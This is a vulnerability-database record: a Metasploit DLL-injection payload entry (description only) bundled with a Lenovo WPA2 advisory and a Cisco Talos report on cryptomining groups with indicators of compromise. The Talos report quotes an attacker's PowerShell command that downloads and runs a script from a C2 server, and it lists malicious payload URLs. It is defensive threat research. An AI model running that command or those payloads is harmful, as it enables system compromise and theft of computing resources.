Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
1976-01-01T00:00:00
ID MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID Type metasploit Reporter Rapid7 Modified 1976-01-01T00:00:00
Description
Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)
{"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID", "hash": "3ccd1a11e976195f23a3aa08606ff56e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:33:14", "history": [{"edition": 1, "bulletin": {"published": "1976-01-01T00:00:00", "type": "metasploit", "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "references": [], "modified": "1976-01-01T00:00:00", "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)", "enchantments": {}, "viewCount": 5, "lastseen": "2017-07-02T23:45:12", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID", "sourceHref": "", "cvelist": [], "objectVersion": "1.4", "history": [], "metasploitReliability": "Normal", "href": "https://www.rapid7.com/db/modules/payload/windows/patchupdllinject/bind_ipv6_tcp_uuid", "cvss": {"score": 0.0, "vector": "NONE"}, "metasploitHistory": "", "sourceData": ""}, "differentElements": ["href"], "lastseen": "2017-07-02T23:45:12"}], "viewCount": 6, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "", "sourceData": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"lenovo": [{"lastseen": "2018-12-19T01:15:00", "references": [], "description": "**Lenovo Security Advisory**: LEN-17420\n\n**Potential Impact: **An attacker could manipulate the vulnerability to affect clients through arbitrary packet decryption and injection, TCP connection hijacking, HTTP content injection, or the replay of unicast and group-addressed frames\n\n**Severity:** High\n\n**Scope of Impact: **Industry-wide\n\n**CVE Identifier: **CVE-2017-5729, CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080, CVE-2017-13081, CVE-2017-13082, CVE-2017-13084, CVE-2017-13086, CVE-2017-13087, CVE-2017-13088\n\n**Summary Description:**\n\nIntel CVE-2017-5729 has been already mitigated in the recommended drivers.\n\nThe Wi-Fi standard uses the Wi-Fi Protected Access II (WPA2) security protocol and security certification program to secure multi-vendor wireless computer networks. A collection of vulnerabilities have been discovered in the WPA2 standard, which in turn makes every standard-compliant implementation vulnerable:\n\n<https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-security-update>\n\nAttackers within wireless range of the access point (AP) and client, can, with some difficulty, attain a man-in-the-middle position. Depending on the data confidentiality protocols in use (e.g. TKIP, CCMP or GCMP) and other situational factors, this could lead to a wide range of disruptions and security flaws such as arbitrary packet decryption and injection, TCP connection hijacking, HTTP content injection, or the replay of unicast, broadcast, and multicast frames.\n\nAs this is an industry-wide issue, the Wi-Fi Alliance and cybersecurity organizations are the best source for information about the threat, exploits, and mitigations:\n\n<https://www.wi-fi.org/security-update-october-2017>\n\n<http://www.icasi.org/wi-fi-protected-access-wpa-vulnerabilities/>\n\n<https://www.kb.cert.org/vuls/id/228519>\n\n**Mitigation Strategy for Customers (what you should do to protect yourself):**\n\nOnce the full details of the exploit have been made public and until Operating System (OS) and device patches are universally applied, users should assume all Wi-Fi access points are essentially public and have the same security levels as ordinary coffee shops or airport Wi-Fi. Users should protect themselves with the usual techniques such as using a VPN, https, SSH, and other common means of verifying endpoints and encrypting communications over public networks.\n\nIn common circumstances, a WPA2 connection is not protected until both sides, typically a client system and an access point, have been patched. Therefore, it is best to assume a connection is insecure if you do not know the status of the other end, and protect yourself as described above.\n\nAll Wi-Fi stacks will have to be updated to follow the new recommended WPA2 key handshake behavior. Lenovo product impact assessment is ongoing; please check this advisory frequently for updates.\n\nMost Windows systems with Wi-Fi capability will be covered by this update from Microsoft:\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-13080>\n\nIn some cases a new Wi-Fi device driver will also be needed. vPro-enabled systems using the AMT management function will need a firmware update.\n\nLinux systems typically receive patches from the distribution\u2019s repository (e.g. Red Hat, SUSE, Ubuntu/Canonical). The distribution suppliers either have \u2013 or are in the process of \u2013 releasing a patch. Users should apply the update from their supplier as soon as it is available.\n\nRouters, smart speakers, and other devices with embedded firmware will see firmware updates released individually. Check the support page for individual devices and apply updates as soon as they are available.\n\n**Product Impact:**\n", "edition": 453, "reporter": "Lenovo", "published": "2018-12-18T15:12:07", "title": "WPA2 Protocol Vulnerabilities - NL", "type": "lenovo", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2017-13079", "CVE-2017-13080", "CVE-2017-13082", "CVE-2017-13078", "CVE-2017-13088", "CVE-2017-13084", "CVE-2017-13081", "CVE-2017-13077", "CVE-2017-5729", "CVE-2017-13087", "CVE-2017-13086"], "modified": "2018-12-18T15:12:57", "id": "LENOVO:PS500143-NOSID", "href": "http://support.lenovo.com/us/en/product_security/len-17420", "cvss": {"score": 5.8, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talosblog": [{"lastseen": "2018-12-18T17:32:28", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "_Post authored by [David Liebenberg](<https://www.google.com/url?q=https://twitter.com/chinahanddave&sa=D&ust=1545149724666000>) and [Andrew Williams](<https://www.google.com/url?q=https://twitter.com/smugyeti&sa=D&ust=1545149724667000>)._ \n\n\n### Executive Summary\n\nThrough Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined. \n \nThis blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies. \n \nWe will cover the recent activities of these actors: \n\n\n * Rocke \u2014A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.\n * 8220 Mining Group \u2014Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.\n * Tor2Mine \u2014A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).\nThese groups have used similar TTPs, including: \n\n\n * Malicious shell scripts masquerading as JPEG files with the name \"logo*.jpg\" that install cron jobs and download and execute miners.\n * The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.\n * Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.\n * Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.\n * Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.\nWe were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nThe recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the [illicit cryptocurrency threat](<https://www.google.com/url?q=https://www.cyberthreatalliance.org/wp-content/uploads/2018/09/CTA-Illicit-CryptoMining-Whitepaper.pdf&sa=D&ust=1545149724689000>). However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published [separate research today covering this trend.](<https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html>) \n\n\n### Timeline of actors' campaigns\n\n#### [](<https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg>) \n--- \nTimeline of Activity \n \n#### Introduction\n\nIllicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware. \n \nThrough our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining. \n \nWe also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nWe first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs. \n \nWe began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named \"tor2mine,\" based on the fact that they additionally used tor2web services for C2 communications. \n \nWe also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits. \n \n\n\n#### \n\n#### Rocke/Iron cybercrime group\n\nCisco Talos wrote about [Rocke](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html&sa=D&ust=1545149724706000>) earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure. \n \nIn the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted [Jenkins ](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/new-jenkins-campaign-hides-malware--kills-competing-crypto-miner&sa=D&ust=1545149724712000>)and [JBoss](<https://www.google.com/url?q=https://www.alibabacloud.com/blog/jbossminer-mining-malware-analysis_593804&sa=D&ust=1545149724712000>) servers, continuing to rely on malicious Git repositories, as well as malicious [Amazon Machine Images](<https://www.google.com/url?q=https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/&sa=D&ust=1545149724714000>). They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware [capabilities](<https://www.google.com/url?q=https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/&sa=D&ust=1545149724714000>). Several campaigns used the XHide Process Faker tool. \n \nWe have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn. \n \nThe dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files. \n \nWhile keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called [whatMiner](<https://www.google.com/url?q=https://github.com/MRdoulestar/whatMiner&sa=D&ust=1545149724720000>), developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as \"collecting and integrating all different kinds of illicit mining malware.\" \n\n\n[](<https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s1600/image2.png>)\n\n#### \n\n#### Git repository for whatMiner\n\nLooking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one. \n \nWhile looking through this repository, we found a folder called \"sustes.\" There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet. \n \nMany of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called \"TermsHost.exe\" from an IP 39[.]108[.]177[.]252, as well as a file called \"xmr.txt\" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called \"TermsHost.exe\" hosted on their C2 ssvs[.]space and a Monero mining config file called \"xmr.txt\" on the C2 sydwzl[.]cn. \n \nWhen we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services. \n \nNote that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke\u2019s github since November, nor have we seen related samples in our honeypots since that time. \n \n\n\n#### 8220 Mining Group\n\nAs we previously described, Rocke originally forked a repository called \"whatMiner.\" We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor \u2014 8220 Mining Group \u2014 due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke. \n \nWe first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed: \n\n\n[](<https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s1600/image6.png>)\n\nWe were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for. \n \nThese campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited [Drupal](<https://www.google.com/url?q=https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/&sa=D&ust=1545149724754000>) content management system, [Hadoop YARN, Redis, Weblogic and Couch](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724756000>)[DB](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724757000>). Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious [Docker images](<https://www.google.com/url?q=https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers&sa=D&ust=1545149724758000>). 8220 Mining Group was able to [amass](<https://www.google.com/url?q=https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html&sa=D&ust=1545149724759000>) nearly $200,000 worth of Monero through their campaigns. \n \nThere were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file \"logo*.jpg\" (very similar to Rocke's use of malicious scripts under the file name of \"logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing. \n \n\n\n#### \n\n#### tor2mine\n\nOver the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden. \n \nRecently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to. \n \nIt is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system: \n \n\n\n> C:\\\\\\Windows\\\\\\System32\\\\\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))\n\n \nWe identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC \u2014 a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk. \n \nWe began to research the malware and infrastructure used in this campaign. We observed [previous research](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron&sa=D&ust=1545149724777000>) on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, \"/win/checking-test.hta,\" that was almost identical to one we saw hosted on the tor2mine actors C2, \"check.hta:\" \n \n/win/checking-test.hta from [previous campaign](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) \n\n\n[](<https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s1600/image3.png>)\n\ncheck.hta \n\n\n[](<https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s1600/image4.png>)\n\nThis actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool. \n \nSimilarly, in [February 2018](<https://www.google.com/url?q=https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/&sa=D&ust=1545149724785000>), Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw. \n \nThis malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign. \n \n\n\n#### \n\n#### Conclusion\n\nThrough tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate. \n \nThe value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue. \n \nThere remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke\u2019s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig. \n \nTalos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies. \n \n\n\n#### \n\n#### Coverage\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://www.google.com/url?q=https://talosintelligence.com/resources/59&sa=D&ust=1545149724800000>) \n\n\n[](<https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png>)\n\n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1545149724807000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1545149724809000>)) or[ Web Security Appliance (WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1545149724810000>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1545149724813000>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1545149724814000>)), and[ Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1545149724816000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1545149724818000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1545149724820000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1545149724823000>). \n \n\n\n### IOCs\n\n#### \n\n#### Rocke\n\nIPs: \n121[.]126[.]223[.]211 \n142[.]44[.]215[.]177 \n144[.]217[.]61[.]147 \n118[.]24[.]150[.]172 \n185[.]133[.]193[.]163 \n \nDomains: \nxmr.enjoytopic[.]tk \nd.paloaltonetworks[.]tk \nthreatpost[.]tk \n3g2upl4pq6kufc4m[.]tk \nscan.3g2upl4pq6kufc4m[.]tk \ne3sas6tzvehwgpak[.]tk \nsample.sydwzl[.]cn \nblockbitcoin[.]com \nscan.blockbitcoin[.]tk \ndazqc4f140wtl[.]cloudfront[.]net \nd3goboxon32grk2l[.]tk \nenjoytopic[.]tk \nrealtimenews[.]tk \n8282[.]space \n3389[.]space \nsvss[.]space \nenjoytopic[.]esy[.]es \nlienjoy[.]esy[.]es \nd3oxpv9ajpsgxt[.]cloudfront[.]net \nd3lvemwrafj7a7[.]cloudfront[.]net \nd1ebv77j9rbkp6[.]enjoytopic[.]com \nswb[.]one \nd1uga3uzpppiit[.]cloudfront[.]net \nemsisoft[.]enjoytopic[.]tk \nejectrift[.]censys[.]xyz \nscan[.]censys[.]xyz \napi[.]leakingprivacy[.]tk \nnews[.]realnewstime[.]xyz \nscan[.]realnewstime[.]xyz \nnews[.]realtimenews[.]tk \nscanaan[.]tk \nwww[.]qicheqiche[.]com \n \nURLs: \nhxxps://github[.]com/yj12ni \nhxxps://github[.]com/rocke \nhxxps://github[.]com/freebtcminer/ \nhxxps://github[.]com/tightsoft \nhxxps://raw[.]githubusercontent[.]com/ghostevilxp \nhxxp://www[.]qicheqiche[.]com \nhxxp://123[.]206[.]13[.]220:8899 \nhxxps://gitee[.]com/c-888/ \nhxxp://gitlab[.]com/c-18 \nhxxp://www[.]ssvs[.]space/root[.]bin \nhxxp://a[.]ssvs[.]space/db[.]sh \nhxxp://a[.]ssvs[.]space/cf[.]cf \nhxxp://a[.]ssvs[.]space/pluto \nhxxp://ip[.]ssvs[.]space/xm64 \nhxxp://ip[.]ssvs[.]space/wt[.]conf \nhxxp://ip[.]ssvs[.]space/mr[.]sh \nhxxp://a[.]ssvs[.]space/logo[.]jpg \nhxxp://a[.]sydwzl[.]cn/root[.]bin \nhxxp://a[.]sydwzl[.]cn/x86[.]bin \nhxxp://a[.]sydwzl[.]cn/bar[.]sh \nhxxp://a[.]sydwzl[.]cn/crondb \nhxxp://a[.]sydwzl[.]cn/pools[.]txt \nhxxps://pastebin[.]com/raw/5bjpjvLP \nhxxps://pastebin[.]com/raw/Fj2YdETv \nhxxps://pastebin[.]com/raw/eRkrSQfE \nhxxps://pastebin[.]com/raw/Gw7mywhC \nhxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg \nhxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg \nhxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg \nhxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408 \n \nSHA-256: \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin \n00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin \ncdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh \n959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf \nd11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64 \nda641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin \n2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf \nb1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh \n7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin \n904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg \nf792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin \ndcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin \n3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh \na598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db \n74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt \n \nSamples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net: \n17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0 \n4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86 \n \nWallets \nrocke@live.cn \n44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W \n44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3 \n45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV \n88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto \n \n\n\n#### 8220 Gang\n\n45[.]32[.]39[.]40:8220 \n45[.]77[.]24[.]16 \n54[.]37[.]57[.]99:8220 \n67[.]21[.]81[.]179:8220 \n67[.]231[.]243[.]10:8220 \n98[.]142[.]140[.]13:8220 \n98[.]142[.]140[.]13:3333 \n98[.]142[.]140[.]13:8888 \n104[.]129[.]171[.]172:8220 \n104[.]225[.]147[.]196:8220 \n128[.]199[.]86[.]57:8220 \n142[.]4[.]124[.]50:8220 \n142[.]4[.]124[.]164:8220 \n158[.]69[.]133[.]17:8220 \n158[.]69[.]133[.]18:8220 \n158[.]69[.]133[.]20:3333 \n162[.]212[.]157[.]244:8220 \n165[.]227[.]215[.]212:8220 \n185[.]82[.]218[.]206:8220 \n192[.]99[.]142[.]226:8220 \n192[.]99[.]142[.]227 \n192[.]99[.]142[.]232:8220 